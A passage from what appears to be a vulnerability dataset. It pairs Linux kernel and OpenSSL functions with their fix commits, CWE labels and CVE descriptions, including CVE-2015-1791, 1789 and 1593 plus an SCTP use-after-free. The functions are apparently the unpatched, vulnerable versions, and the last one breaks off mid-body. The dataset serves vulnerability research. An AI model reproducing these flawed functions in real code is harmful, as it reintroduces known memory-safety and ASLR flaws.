wake_up_interruptible_sync_poll(&pipe->wait, POLLIN | POLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
do_wakeup = 0;
}
pipe->waiting_writers++;
pipe_wait(pipe);
pipe->waiting_writers--;
}
out:
__pipe_unlock(pipe);
if (do_wakeup) {
wake_up_interruptible_sync_poll(&pipe->wait, POLLIN | POLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
return ret;
}
| 332,092,449,061,268,540,000,000,000,000,000,000,000 | pipe.c | 294,209,790,332,872,760,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-1805 | The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an "I/O vector array overrun." | https://nvd.nist.gov/vuln/detail/CVE-2015-1805 |
1,534 | openssl | cd30f03ac5bf2962f44bd02ae8d88245dff2f12c | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/cd30f03ac5bf2962f44bd02ae8d88245dff2f12c | Canonicalise input in CMS_verify.
If content is detached and not binary mode translate the input to
CRLF format. Before this change the input was verified verbatim
which lead to a discrepancy between sign and verify. | 1 | static void do_free_upto(BIO *f, BIO *upto)
{
if (upto)
{
BIO *tbio;
do
{
tbio = BIO_pop(f);
BIO_free(f);
f = tbio;
}
while (f != upto);
}
else
BIO_free_all(f);
}
| 77,045,330,790,459,330,000,000,000,000,000,000,000 | None | null | [
"CWE-399"
] | CVE-2015-1792 | The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function. | https://nvd.nist.gov/vuln/detail/CVE-2015-1792 |
1,535 | openssl | 98ece4eebfb6cd45cc8d550c6ac0022965071afc | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/98ece4eebfb6cd45cc8d550c6ac0022965071afc | Fix race condition in NewSessionTicket
If a NewSessionTicket is received by a multi-threaded client when
attempting to reuse a previous ticket then a race condition can occur
potentially leading to a double free of the ticket data.
CVE-2015-1791
This also fixes RT#3808 where a session ID is changed for a session already
in the client session cache. Since the session ID is the key to the cache
this breaks the cache access.
Parts of this patch were inspired by this Akamai change:
https://github.com/akamai/openssl/commit/c0bf69a791239ceec64509f9f19fcafb2461b0d3
Reviewed-by: Rich Salz <rsalz@openssl.org> | 1 | int ssl3_get_new_session_ticket(SSL *s)
{
int ok, al, ret = 0, ticklen;
long n;
const unsigned char *p;
unsigned char *d;
n = s->method->ssl_get_message(s,
SSL3_ST_CR_SESSION_TICKET_A,
SSL3_ST_CR_SESSION_TICKET_B,
SSL3_MT_NEWSESSION_TICKET, 16384, &ok);
if (!ok)
return ((int)n);
if (n < 6) {
/* need at least ticket_lifetime_hint + ticket length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p = d = (unsigned char *)s->init_msg;
n2l(p, s->session->tlsext_tick_lifetime_hint);
n2s(p, ticklen);
/* ticket_lifetime_hint + ticket_length + ticket */
if (ticklen + 6 != n) {
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
goto f_err;
}
OPENSSL_free(s->session->tlsext_tick);
s->session->tlsext_ticklen = 0;
s->session->tlsext_tick = OPENSSL_malloc(ticklen);
if (!s->session->tlsext_tick) {
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->session->tlsext_tick, p, ticklen);
s->session->tlsext_ticklen = ticklen;
/*
* There are two ways to detect a resumed ticket session. One is to set
* an appropriate session ID and then the server must return a match in
* ServerHello. This allows the normal client session ID matching to work
* and we know much earlier that the ticket has been accepted. The
* other way is to set zero length session ID when the ticket is
* presented and rely on the handshake to determine session resumption.
* We choose the former approach because this fits in with assumptions
* elsewhere in OpenSSL. The session ID is set to the SHA256 (or SHA1 is
* SHA256 is disabled) hash of the ticket.
*/
EVP_Digest(p, ticklen,
s->session->session_id, &s->session->session_id_length,
EVP_sha256(), NULL);
ret = 1;
return (ret);
f_err:
ssl3_send_alert(s, SSL3_AL_FATAL, al);
err:
s->state = SSL_ST_ERR;
return (-1);
}
| 136,608,154,302,472,780,000,000,000,000,000,000,000 | None | null | [
"CWE-362"
] | CVE-2015-1791 | Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier. | https://nvd.nist.gov/vuln/detail/CVE-2015-1791 |
1,536 | openssl | 59302b600e8d5b77ef144e447bb046fd7ab72686 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/59302b600e8d5b77ef144e447bb046fd7ab72686 | PKCS#7: Fix NULL dereference with missing EncryptedContent.
CVE-2015-1790
Reviewed-by: Rich Salz <rsalz@openssl.org> | 1 | BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert)
{
int i, j;
BIO *out = NULL, *btmp = NULL, *etmp = NULL, *bio = NULL;
X509_ALGOR *xa;
ASN1_OCTET_STRING *data_body = NULL;
const EVP_MD *evp_md;
const EVP_CIPHER *evp_cipher = NULL;
EVP_CIPHER_CTX *evp_ctx = NULL;
X509_ALGOR *enc_alg = NULL;
STACK_OF(X509_ALGOR) *md_sk = NULL;
STACK_OF(PKCS7_RECIP_INFO) *rsk = NULL;
PKCS7_RECIP_INFO *ri = NULL;
unsigned char *ek = NULL, *tkey = NULL;
int eklen = 0, tkeylen = 0;
if (p7 == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_INVALID_NULL_POINTER);
return NULL;
}
if (p7->d.ptr == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_NO_CONTENT);
return NULL;
}
i = OBJ_obj2nid(p7->type);
p7->state = PKCS7_S_HEADER;
switch (i) {
case NID_pkcs7_signed:
data_body = PKCS7_get_octet_string(p7->d.sign->contents);
if (!PKCS7_is_detached(p7) && data_body == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_INVALID_SIGNED_DATA_TYPE);
goto err;
}
md_sk = p7->d.sign->md_algs;
break;
case NID_pkcs7_signedAndEnveloped:
rsk = p7->d.signed_and_enveloped->recipientinfo;
md_sk = p7->d.signed_and_enveloped->md_algs;
data_body = p7->d.signed_and_enveloped->enc_data->enc_data;
enc_alg = p7->d.signed_and_enveloped->enc_data->algorithm;
evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
if (evp_cipher == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
goto err;
}
break;
case NID_pkcs7_enveloped:
rsk = p7->d.enveloped->recipientinfo;
enc_alg = p7->d.enveloped->enc_data->algorithm;
data_body = p7->d.enveloped->enc_data->enc_data;
evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
if (evp_cipher == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
goto err;
}
break;
default:
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
goto err;
}
/* We will be checking the signature */
if (md_sk != NULL) {
for (i = 0; i < sk_X509_ALGOR_num(md_sk); i++) {
xa = sk_X509_ALGOR_value(md_sk, i);
if ((btmp = BIO_new(BIO_f_md())) == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
goto err;
}
j = OBJ_obj2nid(xa->algorithm);
evp_md = EVP_get_digestbynid(j);
if (evp_md == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNKNOWN_DIGEST_TYPE);
goto err;
}
BIO_set_md(btmp, evp_md);
if (out == NULL)
out = btmp;
else
BIO_push(out, btmp);
btmp = NULL;
}
}
if (evp_cipher != NULL) {
if ((etmp = BIO_new(BIO_f_cipher())) == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
goto err;
}
/*
* It was encrypted, we need to decrypt the secret key with the
* private key
*/
/*
* Find the recipientInfo which matches the passed certificate (if
* any)
*/
if (pcert) {
for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
if (!pkcs7_cmp_ri(ri, pcert))
break;
ri = NULL;
}
if (ri == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE);
goto err;
}
}
/* If we haven't got a certificate try each ri in turn */
if (pcert == NULL) {
/*
* Always attempt to decrypt all rinfo even after success as a
* defence against MMA timing attacks.
*/
for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
goto err;
ERR_clear_error();
}
} else {
/* Only exit on fatal errors, not decrypt failure */
if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
goto err;
ERR_clear_error();
}
evp_ctx = NULL;
BIO_get_cipher_ctx(etmp, &evp_ctx);
if (EVP_CipherInit_ex(evp_ctx, evp_cipher, NULL, NULL, NULL, 0) <= 0)
goto err;
if (EVP_CIPHER_asn1_to_param(evp_ctx, enc_alg->parameter) < 0)
goto err;
/* Generate random key as MMA defence */
tkeylen = EVP_CIPHER_CTX_key_length(evp_ctx);
tkey = OPENSSL_malloc(tkeylen);
if (!tkey)
goto err;
if (EVP_CIPHER_CTX_rand_key(evp_ctx, tkey) <= 0)
goto err;
if (ek == NULL) {
ek = tkey;
eklen = tkeylen;
tkey = NULL;
}
if (eklen != EVP_CIPHER_CTX_key_length(evp_ctx)) {
/*
* Some S/MIME clients don't use the same key and effective key
* length. The key length is determined by the size of the
* decrypted RSA key.
*/
if (!EVP_CIPHER_CTX_set_key_length(evp_ctx, eklen)) {
/* Use random key as MMA defence */
OPENSSL_clear_free(ek, eklen);
ek = tkey;
eklen = tkeylen;
tkey = NULL;
}
}
/* Clear errors so we don't leak information useful in MMA */
ERR_clear_error();
if (EVP_CipherInit_ex(evp_ctx, NULL, NULL, ek, NULL, 0) <= 0)
goto err;
OPENSSL_clear_free(ek, eklen);
ek = NULL;
OPENSSL_clear_free(tkey, tkeylen);
tkey = NULL;
if (out == NULL)
out = etmp;
else
BIO_push(out, etmp);
etmp = NULL;
}
if (PKCS7_is_detached(p7) || (in_bio != NULL)) {
bio = in_bio;
} else {
if (data_body->length > 0)
bio = BIO_new_mem_buf(data_body->data, data_body->length);
else {
bio = BIO_new(BIO_s_mem());
BIO_set_mem_eof_return(bio, 0);
}
if (bio == NULL)
goto err;
}
BIO_push(out, bio);
bio = NULL;
return out;
err:
OPENSSL_clear_free(ek, eklen);
OPENSSL_clear_free(tkey, tkeylen);
BIO_free_all(out);
BIO_free_all(btmp);
BIO_free_all(etmp);
BIO_free_all(bio);
return NULL;
}
| 294,269,827,177,663,870,000,000,000,000,000,000,000 | None | null | [
"CWE-703"
] | CVE-2015-1790 | The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data. | https://nvd.nist.gov/vuln/detail/CVE-2015-1790 |
1,537 | openssl | f48b83b4fb7d6689584cf25f61ca63a4891f5b11 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/f48b83b4fb7d6689584cf25f61ca63a4891f5b11 | Fix length checks in X509_cmp_time to avoid out-of-bounds reads.
Also tighten X509_cmp_time to reject more than three fractional
seconds in the time; and to reject trailing garbage after the offset.
CVE-2015-1789
Reviewed-by: Viktor Dukhovni <viktor@openssl.org>
Reviewed-by: Richard Levitte <levitte@openssl.org> | 1 | int X509_cmp_time(const ASN1_TIME *ctm, time_t *cmp_time)
{
char *str;
ASN1_TIME atm;
long offset;
char buff1[24], buff2[24], *p;
int i, j;
p = buff1;
i = ctm->length;
str = (char *)ctm->data;
if (ctm->type == V_ASN1_UTCTIME) {
if ((i < 11) || (i > 17))
return 0;
memcpy(p, str, 10);
p += 10;
str += 10;
} else {
if (i < 13)
return 0;
memcpy(p, str, 12);
p += 12;
str += 12;
}
if ((*str == 'Z') || (*str == '-') || (*str == '+')) {
*(p++) = '0';
*(p++) = '0';
} else {
*(p++) = *(str++);
*(p++) = *(str++);
/* Skip any fractional seconds... */
if (*str == '.') {
str++;
while ((*str >= '0') && (*str <= '9'))
str++;
}
}
*(p++) = 'Z';
*(p++) = '\0';
if (*str == 'Z')
offset = 0;
else {
if ((*str != '+') && (*str != '-'))
return 0;
offset = ((str[1] - '0') * 10 + (str[2] - '0')) * 60;
offset += (str[3] - '0') * 10 + (str[4] - '0');
if (*str == '-')
offset = -offset;
}
atm.type = ctm->type;
atm.flags = 0;
atm.length = sizeof(buff2);
atm.data = (unsigned char *)buff2;
if (X509_time_adj(&atm, offset * 60, cmp_time) == NULL)
return 0;
if (ctm->type == V_ASN1_UTCTIME) {
i = (buff1[0] - '0') * 10 + (buff1[1] - '0');
if (i < 50)
i += 100; /* cf. RFC 2459 */
j = (buff2[0] - '0') * 10 + (buff2[1] - '0');
if (j < 50)
j += 100;
if (i < j)
return -1;
if (i > j)
return 1;
}
i = strcmp(buff1, buff2);
if (i == 0) /* wait a second then return younger :-) */
return -1;
else
return i;
}
| 277,602,867,865,507,800,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-1789 | The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback. | https://nvd.nist.gov/vuln/detail/CVE-2015-1789 |
1,538 | linux | 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | x86, mm/ASLR: Fix stack randomization on 64-bit systems
The issue is that the stack for processes is not properly randomized on
64 bit architectures due to an integer overflow.
The affected function is randomize_stack_top() in file
"fs/binfmt_elf.c":
static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
return PAGE_ALIGN(stack_top) + random_variable;
return PAGE_ALIGN(stack_top) - random_variable;
}
Note that, it declares the "random_variable" variable as "unsigned int".
Since the result of the shifting operation between STACK_RND_MASK (which
is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
random_variable <<= PAGE_SHIFT;
then the two leftmost bits are dropped when storing the result in the
"random_variable". This variable shall be at least 34 bits long to hold
the (22+12) result.
These two dropped bits have an impact on the entropy of process stack.
Concretely, the total stack entropy is reduced by four: from 2^28 to
2^30 (One fourth of expected entropy).
This patch restores back the entropy by correcting the types involved
in the operations in the functions randomize_stack_top() and
stack_maxrandom_size().
The successful fix can be tested with:
$ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0 [stack]
7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0 [stack]
7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0 [stack]
7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0 [stack]
...
Once corrected, the leading bytes should be between 7ffc and 7fff,
rather than always being 7fff.
Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
Signed-off-by: Ismael Ripoll <iripoll@upv.es>
[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: <stable@vger.kernel.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Fixes: CVE-2015-1593
Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | static unsigned int stack_maxrandom_size(void)
{
unsigned int max = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
}
return max;
}
| 221,663,256,924,278,800,000,000,000,000,000,000,000 | mmap.c | 64,657,617,513,672,540,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1593 | The stack randomization feature in the Linux kernel before 3.19.1 on 64-bit platforms uses incorrect data types for the results of bitwise left-shift operations, which makes it easier for attackers to bypass the ASLR protection mechanism by predicting the address of the top of the stack, related to the randomize_stack_top function in fs/binfmt_elf.c and the stack_maxrandom_size function in arch/x86/mm/mmap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-1593 |
1,539 | linux | 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | x86, mm/ASLR: Fix stack randomization on 64-bit systems
The issue is that the stack for processes is not properly randomized on
64 bit architectures due to an integer overflow.
The affected function is randomize_stack_top() in file
"fs/binfmt_elf.c":
static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
return PAGE_ALIGN(stack_top) + random_variable;
return PAGE_ALIGN(stack_top) - random_variable;
}
Note that, it declares the "random_variable" variable as "unsigned int".
Since the result of the shifting operation between STACK_RND_MASK (which
is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
random_variable <<= PAGE_SHIFT;
then the two leftmost bits are dropped when storing the result in the
"random_variable". This variable shall be at least 34 bits long to hold
the (22+12) result.
These two dropped bits have an impact on the entropy of process stack.
Concretely, the total stack entropy is reduced by four: from 2^28 to
2^30 (One fourth of expected entropy).
This patch restores back the entropy by correcting the types involved
in the operations in the functions randomize_stack_top() and
stack_maxrandom_size().
The successful fix can be tested with:
$ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0 [stack]
7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0 [stack]
7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0 [stack]
7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0 [stack]
...
Once corrected, the leading bytes should be between 7ffc and 7fff,
rather than always being 7fff.
Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
Signed-off-by: Ismael Ripoll <iripoll@upv.es>
[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: <stable@vger.kernel.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Fixes: CVE-2015-1593
Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
#ifdef CONFIG_STACK_GROWSUP
return PAGE_ALIGN(stack_top) + random_variable;
#else
return PAGE_ALIGN(stack_top) - random_variable;
#endif
}
| 272,678,573,193,334,060,000,000,000,000,000,000,000 | binfmt_elf.c | 233,173,923,575,517,170,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1593 | The stack randomization feature in the Linux kernel before 3.19.1 on 64-bit platforms uses incorrect data types for the results of bitwise left-shift operations, which makes it easier for attackers to bypass the ASLR protection mechanism by predicting the address of the top of the stack, related to the randomize_stack_top function in fs/binfmt_elf.c and the stack_maxrandom_size function in arch/x86/mm/mmap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-1593 |
1,542 | linux | 600ddd6825543962fb807884169e57b580dba208 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/600ddd6825543962fb807884169e57b580dba208 | net: sctp: fix slab corruption from use after free on INIT collisions
When hitting an INIT collision case during the 4WHS with AUTH enabled, as
already described in detail in commit 1be9a950c646 ("net: sctp: inherit
auth_capable on INIT collisions"), it can happen that we occasionally
still remotely trigger the following panic on server side which seems to
have been uncovered after the fix from commit 1be9a950c646 ...
[ 533.876389] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 533.913657] IP: [<ffffffff811ac385>] __kmalloc+0x95/0x230
[ 533.940559] PGD 5030f2067 PUD 0
[ 533.957104] Oops: 0000 [#1] SMP
[ 533.974283] Modules linked in: sctp mlx4_en [...]
[ 534.939704] Call Trace:
[ 534.951833] [<ffffffff81294e30>] ? crypto_init_shash_ops+0x60/0xf0
[ 534.984213] [<ffffffff81294e30>] crypto_init_shash_ops+0x60/0xf0
[ 535.015025] [<ffffffff8128c8ed>] __crypto_alloc_tfm+0x6d/0x170
[ 535.045661] [<ffffffff8128d12c>] crypto_alloc_base+0x4c/0xb0
[ 535.074593] [<ffffffff8160bd42>] ? _raw_spin_lock_bh+0x12/0x50
[ 535.105239] [<ffffffffa0418c11>] sctp_inet_listen+0x161/0x1e0 [sctp]
[ 535.138606] [<ffffffff814e43bd>] SyS_listen+0x9d/0xb0
[ 535.166848] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
... or depending on the the application, for example this one:
[ 1370.026490] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 1370.026506] IP: [<ffffffff811ab455>] kmem_cache_alloc+0x75/0x1d0
[ 1370.054568] PGD 633c94067 PUD 0
[ 1370.070446] Oops: 0000 [#1] SMP
[ 1370.085010] Modules linked in: sctp kvm_amd kvm [...]
[ 1370.963431] Call Trace:
[ 1370.974632] [<ffffffff8120f7cf>] ? SyS_epoll_ctl+0x53f/0x960
[ 1371.000863] [<ffffffff8120f7cf>] SyS_epoll_ctl+0x53f/0x960
[ 1371.027154] [<ffffffff812100d3>] ? anon_inode_getfile+0xd3/0x170
[ 1371.054679] [<ffffffff811e3d67>] ? __alloc_fd+0xa7/0x130
[ 1371.080183] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
With slab debugging enabled, we can see that the poison has been overwritten:
[ 669.826368] BUG kmalloc-128 (Tainted: G W ): Poison overwritten
[ 669.826385] INFO: 0xffff880228b32e50-0xffff880228b32e50. First byte 0x6a instead of 0x6b
[ 669.826414] INFO: Allocated in sctp_auth_create_key+0x23/0x50 [sctp] age=3 cpu=0 pid=18494
[ 669.826424] __slab_alloc+0x4bf/0x566
[ 669.826433] __kmalloc+0x280/0x310
[ 669.826453] sctp_auth_create_key+0x23/0x50 [sctp]
[ 669.826471] sctp_auth_asoc_create_secret+0xcb/0x1e0 [sctp]
[ 669.826488] sctp_auth_asoc_init_active_key+0x68/0xa0 [sctp]
[ 669.826505] sctp_do_sm+0x29d/0x17c0 [sctp] [...]
[ 669.826629] INFO: Freed in kzfree+0x31/0x40 age=1 cpu=0 pid=18494
[ 669.826635] __slab_free+0x39/0x2a8
[ 669.826643] kfree+0x1d6/0x230
[ 669.826650] kzfree+0x31/0x40
[ 669.826666] sctp_auth_key_put+0x19/0x20 [sctp]
[ 669.826681] sctp_assoc_update+0x1ee/0x2d0 [sctp]
[ 669.826695] sctp_do_sm+0x674/0x17c0 [sctp]
Since this only triggers in some collision-cases with AUTH, the problem at
heart is that sctp_auth_key_put() on asoc->asoc_shared_key is called twice
when having refcnt 1, once directly in sctp_assoc_update() and yet again
from within sctp_auth_asoc_init_active_key() via sctp_assoc_update() on
the already kzfree'd memory, which is also consistent with the observation
of the poison decrease from 0x6b to 0x6a (note: the overwrite is detected
at a later point in time when poison is checked on new allocation).
Reference counting of auth keys revisited:
Shared keys for AUTH chunks are being stored in endpoints and associations
in endpoint_shared_keys list. On endpoint creation, a null key is being
added; on association creation, all endpoint shared keys are being cached
and thus cloned over to the association. struct sctp_shared_key only holds
a pointer to the actual key bytes, that is, struct sctp_auth_bytes which
keeps track of users internally through refcounting. Naturally, on assoc
or enpoint destruction, sctp_shared_key are being destroyed directly and
the reference on sctp_auth_bytes dropped.
User space can add keys to either list via setsockopt(2) through struct
sctp_authkey and by passing that to sctp_auth_set_key() which replaces or
adds a new auth key. There, sctp_auth_create_key() creates a new sctp_auth_bytes
with refcount 1 and in case of replacement drops the reference on the old
sctp_auth_bytes. A key can be set active from user space through setsockopt()
on the id via sctp_auth_set_active_key(), which iterates through either
endpoint_shared_keys and in case of an assoc, invokes (one of various places)
sctp_auth_asoc_init_active_key().
sctp_auth_asoc_init_active_key() computes the actual secret from local's
and peer's random, hmac and shared key parameters and returns a new key
directly as sctp_auth_bytes, that is asoc->asoc_shared_key, plus drops
the reference if there was a previous one. The secret, which where we
eventually double drop the ref comes from sctp_auth_asoc_set_secret() with
intitial refcount of 1, which also stays unchanged eventually in
sctp_assoc_update(). This key is later being used for crypto layer to
set the key for the hash in crypto_hash_setkey() from sctp_auth_calculate_hmac().
To close the loop: asoc->asoc_shared_key is freshly allocated secret
material and independant of the sctp_shared_key management keeping track
of only shared keys in endpoints and assocs. Hence, also commit 4184b2a79a76
("net: sctp: fix memory leak in auth key management") is independant of
this bug here since it concerns a different layer (though same structures
being used eventually). asoc->asoc_shared_key is reference dropped correctly
on assoc destruction in sctp_association_free() and when active keys are
being replaced in sctp_auth_asoc_init_active_key(), it always has a refcount
of 1. Hence, it's freed prematurely in sctp_assoc_update(). Simple fix is
to remove that sctp_auth_key_put() from there which fixes these panics.
Fixes: 730fc3d05cd4 ("[SCTP]: Implete SCTP-AUTH parameter processing")
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void sctp_assoc_update(struct sctp_association *asoc,
struct sctp_association *new)
{
struct sctp_transport *trans;
struct list_head *pos, *temp;
/* Copy in new parameters of peer. */
asoc->c = new->c;
asoc->peer.rwnd = new->peer.rwnd;
asoc->peer.sack_needed = new->peer.sack_needed;
asoc->peer.auth_capable = new->peer.auth_capable;
asoc->peer.i = new->peer.i;
sctp_tsnmap_init(&asoc->peer.tsn_map, SCTP_TSN_MAP_INITIAL,
asoc->peer.i.initial_tsn, GFP_ATOMIC);
/* Remove any peer addresses not present in the new association. */
list_for_each_safe(pos, temp, &asoc->peer.transport_addr_list) {
trans = list_entry(pos, struct sctp_transport, transports);
if (!sctp_assoc_lookup_paddr(new, &trans->ipaddr)) {
sctp_assoc_rm_peer(asoc, trans);
continue;
}
if (asoc->state >= SCTP_STATE_ESTABLISHED)
sctp_transport_reset(trans);
}
/* If the case is A (association restart), use
* initial_tsn as next_tsn. If the case is B, use
* current next_tsn in case data sent to peer
* has been discarded and needs retransmission.
*/
if (asoc->state >= SCTP_STATE_ESTABLISHED) {
asoc->next_tsn = new->next_tsn;
asoc->ctsn_ack_point = new->ctsn_ack_point;
asoc->adv_peer_ack_point = new->adv_peer_ack_point;
/* Reinitialize SSN for both local streams
* and peer's streams.
*/
sctp_ssnmap_clear(asoc->ssnmap);
/* Flush the ULP reassembly and ordered queue.
* Any data there will now be stale and will
* cause problems.
*/
sctp_ulpq_flush(&asoc->ulpq);
/* reset the overall association error count so
* that the restarted association doesn't get torn
* down on the next retransmission timer.
*/
asoc->overall_error_count = 0;
} else {
/* Add any peer addresses from the new association. */
list_for_each_entry(trans, &new->peer.transport_addr_list,
transports) {
if (!sctp_assoc_lookup_paddr(asoc, &trans->ipaddr))
sctp_assoc_add_peer(asoc, &trans->ipaddr,
GFP_ATOMIC, trans->state);
}
asoc->ctsn_ack_point = asoc->next_tsn - 1;
asoc->adv_peer_ack_point = asoc->ctsn_ack_point;
if (!asoc->ssnmap) {
/* Move the ssnmap. */
asoc->ssnmap = new->ssnmap;
new->ssnmap = NULL;
}
if (!asoc->assoc_id) {
/* get a new association id since we don't have one
* yet.
*/
sctp_assoc_set_id(asoc, GFP_ATOMIC);
}
}
